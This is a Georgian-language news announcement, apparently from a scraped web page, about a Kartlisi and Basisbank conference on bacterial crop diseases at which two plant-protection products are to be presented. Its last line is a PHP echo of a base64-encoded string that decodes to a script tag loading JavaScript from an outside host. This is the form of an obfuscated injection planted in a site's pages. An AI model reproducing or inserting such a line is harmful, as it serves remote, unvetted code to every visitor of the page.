celsiusi
ავერსი საქკაბელი

"ბაზისბანკთან" პარტნიორობით, 1 დეკემბერს, სასტუმრო “რედისონ ბლუ ივერიაში“ გაიმართება კონფერენცია - „ბაქტერიული დაავადებების გავრცელება საქართველოში და მათთან ბრძოლის თანამედროვე მეთოდები“, სადაც „კარტლისი“ ფერმერებს ბაქტერიული დაავადებების წინააღმდეგ ბრძოლის თანამედროვე ტექნოლოგიებს გააცნობს.

კლიმატის ცვლილებები, მომატებული ტემპერატურა, ნალექი და ტენიანობა ბაქტერიული დაავადებების გავრცელებისთვის ხელსაყრელი გარემოებებია, სწორედ ამ პირობებში განსაკუთრებით მნიშვნელოვანია დაავადებების მართვა და მათ წინააღმდეგ ღონისძიებების აგრო ვადებში, სწორი აგროტექნოლოგიით დაგეგმვა.

კონფერენციას, უცხოეთიდან მოწვეული სპეციალისტები და საქართველოს სხვადასხვა რეგიონიდან დელეგატები დაესწრებიან.

შეხვედრაზე განიხილება ევროპასა და აშშ-ში ბაქტერიული დაავადებების წინააღმდეგ საბრძოლველად აქტიურად გამოყენებადი თანამედროვე მიდგომები და ახალი პრაქტიკები. კონფერენციაზე დამსწრეებს საშუალება ექნებათ კითხვა-პასუხის რეჟიმში მიიღონ მათთვის სასურველი ინფორმაცია და სწორად დაგეგმონ მომავალი წლის სამუშაოები.

შეხვედრისას კარტლისი ფერმერებს ორ ახალ პროდუქტს - „კოსაიდ ოპტის“ და ბიოლოგიურ პრეპარატ „ამილო X“-ს წარუდგენს.

ბაზისბანკი და კომპანია „კარტლისი“ აგრარულ სექტორში ჩართული ფერმერებისთვის თანამედროვე ცოდნისა და ტექნოლოგიების გაზიარებას მუდმივად ახორციელებს.

264
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");